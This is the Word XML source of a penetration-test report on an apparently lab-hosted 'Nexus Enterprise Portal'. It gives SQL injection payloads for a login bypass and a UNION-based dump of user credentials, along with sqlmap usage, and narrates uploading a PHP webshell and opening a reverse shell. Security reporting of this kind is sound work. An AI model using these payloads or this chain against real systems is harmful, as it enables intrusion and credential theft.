              <w:t>CWE-89: Improper Neutralization of Special Elements used in an SQL Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D22CA" w:rsidRPr="007D22CA" w14:paraId="619CC4E9" w14:textId="77777777" w:rsidTr="007D2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6B35D8F" w14:textId="77777777" w:rsidR="007D22CA" w:rsidRPr="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D9216D">
            <w:r w:rsidRPr="007D22CA">
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A192491" w14:textId="77777777" w:rsidR="007D22CA" w:rsidRPr="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D921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22CA">
              <w:t>9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D22CA" w:rsidRPr="007D22CA" w14:paraId="18AA6308" w14:textId="77777777" w:rsidTr="007D2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63B109C" w14:textId="77777777" w:rsidR="007D22CA" w:rsidRPr="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D9216D">
            <w:r w:rsidRPr="007D22CA">
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32F91514" w14:textId="77777777" w:rsidR="007D22CA" w:rsidRPr="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D921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22CA">
              <w:t>Attacker bypasses authentication entirely and logs in as administrator without knowing the password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D22CA" w:rsidRPr="007D22CA" w14:paraId="715737AC" w14:textId="77777777" w:rsidTr="007D2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BA5D750" w14:textId="77777777" w:rsidR="007D22CA" w:rsidRPr="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D9216D">
            <w:r w:rsidRPr="007D22CA">
              <w:t>Trigger Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0441F4C1" w14:textId="77777777" w:rsidR="007D22CA" w:rsidRPr="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D921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22CA">
              <w:t>username: admin' OR '1'='1 / password: anything</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D22CA" w:rsidRPr="007D22CA" w14:paraId="76C1952D" w14:textId="77777777" w:rsidTr="007D2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9FFBE17" w14:textId="77777777" w:rsidR="007D22CA" w:rsidRPr="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D9216D">
            <w:r w:rsidRPr="007D22CA">
              <w:t>Evidence URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="232C54E5" w14:textId="77777777" w:rsidR="007D22CA" w:rsidRPr="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D921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22CA">
              <w:t>POST /login with body username=admin' OR '1'='1&amp;password=x</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76AEC640" w14:textId="77777777" w:rsidR="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00576EE0"/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4155"/>
        <w:gridCol w:w="5195"/>
      </w:tblGrid>
      <w:tr w:rsidR="00576EE0" w:rsidRPr="00576EE0" w14:paraId="3AAAA1F9" w14:textId="77777777" w:rsidTr="00576E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A746B04" w14:textId="77777777" w:rsidR="00576EE0" w:rsidRPr="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="00807E37">
            <w:r w:rsidRPr="00576EE0">
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F3A4D0C" w14:textId="77777777" w:rsidR="00576EE0" w:rsidRPr="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="00807E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76EE0">
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00576EE0" w:rsidRPr="00576EE0" w14:paraId="5CF2C719" w14:textId="77777777" w:rsidTr="00576E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F14946A" w14:textId="77777777" w:rsidR="00576EE0" w:rsidRPr="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="00807E37">
            <w:r w:rsidRPr="00576EE0">
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="138E80E0" w14:textId="77777777" w:rsidR="00576EE0" w:rsidRPr="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="00807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6EE0">
              <w:t>GET /directory — Employee Directory Search</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00576EE0" w:rsidRPr="00576EE0" w14:paraId="2B54C9F1" w14:textId="77777777" w:rsidTr="00576E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8CCECFC" w14:textId="77777777" w:rsidR="00576EE0" w:rsidRPr="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="00807E37">
            <w:r w:rsidRPr="00576EE0">
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18AC76C3" w14:textId="77777777" w:rsidR="00576EE0" w:rsidRPr="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="00807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6EE0">
              <w:t>search (URL query string)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00576EE0" w:rsidRPr="00576EE0" w14:paraId="6929E62B" w14:textId="77777777" w:rsidTr="00576E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ED3F7BE" w14:textId="77777777" w:rsidR="00576EE0" w:rsidRPr="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="00807E37">
            <w:r w:rsidRPr="00576EE0">
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54D42204" w14:textId="2EC98C85" w:rsidR="00576EE0" w:rsidRPr="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="00807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6EE0">
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00576EE0" w:rsidRPr="00576EE0" w14:paraId="0C29D963" w14:textId="77777777" w:rsidTr="00576E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76FDCFC" w14:textId="77777777" w:rsidR="00576EE0" w:rsidRPr="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="00807E37">
            <w:r w:rsidRPr="00576EE0">
              <w:lastRenderedPageBreak/>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="697D6F75" w14:textId="77777777" w:rsidR="00576EE0" w:rsidRPr="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="00807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6EE0">
              <w:t>CWE-89: Improper Neutralization of Special Elements used in an SQL Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00576EE0" w:rsidRPr="00576EE0" w14:paraId="729537D9" w14:textId="77777777" w:rsidTr="00576E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C85646F" w14:textId="77777777" w:rsidR="00576EE0" w:rsidRPr="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="00807E37">
            <w:r w:rsidRPr="00576EE0">
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="646ADC60" w14:textId="77777777" w:rsidR="00576EE0" w:rsidRPr="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="00807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6EE0">
              <w:t>9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00576EE0" w:rsidRPr="00576EE0" w14:paraId="57F24822" w14:textId="77777777" w:rsidTr="00576E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18C6C07" w14:textId="77777777" w:rsidR="00576EE0" w:rsidRPr="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="00807E37">
            <w:r w:rsidRPr="00576EE0">
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63192D78" w14:textId="77777777" w:rsidR="00576EE0" w:rsidRPr="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="00807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576EE0">
              <w:t>Attacker</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00576EE0">
              <w:t xml:space="preserve"> extracts the full database contents including usernames, plaintext passwords, and roles using a UNION-based injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00576EE0" w:rsidRPr="00576EE0" w14:paraId="26EB5152" w14:textId="77777777" w:rsidTr="00576E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4C61DA4" w14:textId="77777777" w:rsidR="00576EE0" w:rsidRPr="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="00807E37">
            <w:r w:rsidRPr="00576EE0">
              <w:t>Trigger Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F6BD586" w14:textId="77777777" w:rsidR="00576EE0" w:rsidRPr="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="00807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6EE0">
              <w:t xml:space="preserve">' UNION SELECT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00576EE0">
              <w:t>username,password</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00576EE0">
              <w:t>,</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00576EE0">
              <w:t>role,email</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00576EE0">
              <w:t xml:space="preserve"> FROM users--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00576EE0" w:rsidRPr="00576EE0" w14:paraId="04AC3611" w14:textId="77777777" w:rsidTr="00576E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C9B6FE3" w14:textId="77777777" w:rsidR="00576EE0" w:rsidRPr="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="00807E37">
            <w:r w:rsidRPr="00576EE0">
              <w:t>Evidence URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62201AAC" w14:textId="77777777" w:rsidR="00576EE0" w:rsidRPr="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="00807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6EE0">
              <w:t xml:space="preserve">http://192.168.100.205:5000/directory?search=' UNION SELECT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00576EE0">
              <w:t>username,password</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00576EE0">
              <w:t>,</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00576EE0">
              <w:t>role,email</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00576EE0">
              <w:t xml:space="preserve"> FROM users--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FAC06FF" w14:textId="77777777" w:rsidR="00576EE0" w:rsidRDefault="00576EE0" w:rsidP="007D22CA"/>
    <w:p w14:paraId="3C8C5741" w14:textId="72A1AE63" w:rsidR="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="007D22CA">
      <w:r w:rsidRPr="007D22CA">
        <w:t>Chang</w:t>
      </w:r>
      <w:r>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="007D22CA">
        <w:t xml:space="preserve"> username=admin' OR '1'='1&amp;password=anything</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to gain authentication bypass:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687C0263" w14:textId="6BEADB7A" w:rsidR="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00724BA4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00724BA4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A6D2D86" wp14:editId="4B83FCDB">
            <wp:extent cx="4288144" cy="3277040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18588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423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90040" cy="327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9757" w14:textId="34CA8A31" w:rsidR="00724BA4" w:rsidRDefault="00724BA4" w:rsidP="00724BA4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00724BA4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59244C98" wp14:editId="2BD30A37">
            <wp:extent cx="4305080" cy="2353996"/>
            <wp:effectExtent l="0" t="0" r="635" b="8255"/>
            <wp:docPr id="19779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37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14633" cy="235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2DAC" w14:textId="77777777" w:rsidR="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="007D22CA"/>
    <w:p w14:paraId="4CF8BEDE" w14:textId="2AD60AD7" w:rsidR="00D670CF" w:rsidRPr="00576EE0" w:rsidRDefault="007D22CA" w:rsidP="00D670CF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576EE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00576EE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00576EE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BD3CA9" w14:textId="77777777" w:rsidR="00D670CF" w:rsidRDefault="00D670CF" w:rsidP="00D670CF"/>
    <w:p w14:paraId="42E545B3" w14:textId="63CC44A5" w:rsidR="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D670CF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007D22CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E725891" wp14:editId="7CC01334">
            <wp:extent cx="4160441" cy="3012763"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="85875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5136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87371" cy="303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7B15" w14:textId="77777777" w:rsidR="00D670CF" w:rsidRDefault="00D670CF" w:rsidP="00D670CF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32A23590" w14:textId="1A24FD7E" w:rsidR="00D670CF" w:rsidRDefault="00D670CF" w:rsidP="007D22CA">
      <w:r w:rsidRPr="00D670CF">
        <w:t xml:space="preserve">Then dump the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D670CF">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D670CF">
        <w:t xml:space="preserve"> table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5259F6F4" w14:textId="1B4A9550" w:rsidR="00D670CF" w:rsidRDefault="00D670CF" w:rsidP="00D670CF">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">Here </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> found the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>user name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and password for the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7673C503" w14:textId="77777777" w:rsidR="00D670CF" w:rsidRDefault="00D670CF" w:rsidP="007D22CA"/>
    <w:p w14:paraId="7A238FBB" w14:textId="76F57DBA" w:rsidR="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D670CF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007D22CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="634B8512" wp14:editId="2C44AE94">
            <wp:extent cx="4511216" cy="2763120"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="3365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13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20895" cy="276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1D71" w14:textId="28144485" w:rsidR="007D22CA" w:rsidRDefault="007D22CA" w:rsidP="00D670CF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007D22CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C955771" wp14:editId="65811AD6">
            <wp:extent cx="4490074" cy="1018422"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="137547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768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05857" cy="102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466D" w14:textId="77777777" w:rsidR="009B73CB" w:rsidRDefault="009B73CB" w:rsidP="009B73CB"/>
    <w:p w14:paraId="7CB08274" w14:textId="5A2C310C" w:rsidR="009B73CB" w:rsidRPr="009D0779" w:rsidRDefault="009D0779" w:rsidP="009B73CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0779">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.4 Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5EF769" w14:textId="68BFE17A" w:rsidR="009D0779" w:rsidRDefault="009D0779" w:rsidP="009B73CB">
      <w:r w:rsidRPr="009D0779">
        <w:t>3.4.1 Exploit Chain Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEA6EC2" w14:textId="312E347E" w:rsidR="009D0779" w:rsidRDefault="00555C0A" w:rsidP="009B73CB">
      <w:r w:rsidRPr="00555C0A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54A087EF" wp14:editId="2D8BC493">
            <wp:extent cx="4961050" cy="1661304"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="165871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1675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0197" w14:textId="5F045826" w:rsidR="00555C0A" w:rsidRDefault="00555C0A" w:rsidP="009B73CB">
      <w:r w:rsidRPr="00555C0A">
        <w:t xml:space="preserve">3.4.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555C0A">
        <w:t>Webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555C0A">
        <w:t xml:space="preserve"> / Reverse Shell Delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29411E7A" w14:textId="2EC63008" w:rsidR="00555C0A" w:rsidRDefault="00555C0A" w:rsidP="009B73CB">
      <w:r w:rsidRPr="00555C0A">
        <w:t>Creat</w:t>
      </w:r>
      <w:r>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="00555C0A">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555C0A">
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555C0A">
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> then u</w:t>
      </w:r>
      <w:r w:rsidRPr="00555C0A">
        <w:t>pload</w:t>
      </w:r>
      <w:r>
        <w:t>ing it</w:t>
      </w:r>
      <w:r w:rsidRPr="00555C0A">
        <w:t xml:space="preserve"> via curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> then </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00555C0A">
        <w:t>onfirm</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00555C0A">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555C0A">
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555C0A">
        <w:t xml:space="preserve"> is accessible</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C26EEB" w14:textId="703C3560" w:rsidR="00555C0A" w:rsidRDefault="00555C0A" w:rsidP="00555C0A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00555C0A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50D89697" wp14:editId="054B111A">
            <wp:extent cx="4104317" cy="3240042"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="124902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2372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35189" cy="326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42F4" w14:textId="59983A20" w:rsidR="00555C0A" w:rsidRDefault="00555C0A" w:rsidP="00555C0A">
      <w:r w:rsidRPr="00555C0A">
        <w:t xml:space="preserve">Command </w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00555C0A">
        <w:t xml:space="preserve">xecution </w:t>
      </w:r>
      <w:r>
        <w:t>by</w:t>
      </w:r>
      <w:r w:rsidRPr="00555C0A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00555C0A">
        <w:t>ebshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4866F90B" w14:textId="4FFCF811" w:rsidR="00555C0A" w:rsidRDefault="00555C0A" w:rsidP="00555C0A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00555C0A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36C595FE" wp14:editId="11A5D9A6">
            <wp:extent cx="4292102" cy="1997937"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="213639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9955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07728" cy="20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76EA" w14:textId="77777777" w:rsidR="00555C0A" w:rsidRDefault="00555C0A" w:rsidP="00555C0A"/>
    <w:p w14:paraId="58D36A29" w14:textId="777C897A" w:rsidR="00555C0A" w:rsidRDefault="00555C0A" w:rsidP="00555C0A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A5038">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reverse Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AC2CF9" w14:textId="1E959401" w:rsidR="00432D73" w:rsidRDefault="00432D73" w:rsidP="00555C0A">
      <w:r w:rsidRPr="00432D73">
        <w:t>The objective of this phase was to chain the discovered vulnerabilities to achieve Remote Code Execution (RCE) and gain unauthorized access to the underlying server hosting the Nexus Enterprise Portal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BE8066" w14:textId="77777777" w:rsidR="00432D73" w:rsidRDefault="00432D73" w:rsidP="00432D73">
      <w:r>
        <w:t>The exploit chain was executed in the following sequence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21508E71" w14:textId="77777777" w:rsidR="00432D73" w:rsidRDefault="00432D73" w:rsidP="00432D73"/>
    <w:p w14:paraId="5F6B0153" w14:textId="77777777" w:rsidR="00432D73" w:rsidRDefault="00432D73" w:rsidP="00432D73">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Initial Access vector: The Unrestricted File Upload vulnerability (CWE-434) on the /profile endpoint was utilized to bypass intended functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5465CBCA" w14:textId="77777777" w:rsidR="00432D73" w:rsidRDefault="00432D73" w:rsidP="00432D73">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload Staging: A malicious PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) was crafted and uploaded masquerading as a profile avatar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A16030" w14:textId="77777777" w:rsidR="00432D73" w:rsidRDefault="00432D73" w:rsidP="00432D73">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Execution: The uploaded </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was accessed directly via its static path (/static/uploads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">), allowing arbitrary OS commands to be passed via the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> GET parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378912D6" w14:textId="65151A5D" w:rsidR="00432D73" w:rsidRDefault="00432D73" w:rsidP="00432D73">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Escalation to Interactive Shell: A reverse shell payload was injected into the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to establish a direct, interactive connection back to the attacker's machine, granting full control over the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>omar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> user account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374706F3" w14:textId="5FD67DFD" w:rsidR="00432D73" w:rsidRPr="00432D73" w:rsidRDefault="00432D73" w:rsidP="00555C0A">
      <w:r>
        <w:t>Opening the listener at port 4444:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F85A89C" w14:textId="6EDFB8BE" w:rsidR="00555C0A" w:rsidRDefault="00432D73" w:rsidP="00555C0A">
      <w:r w:rsidRPr="00432D73">
        <w:drawing>
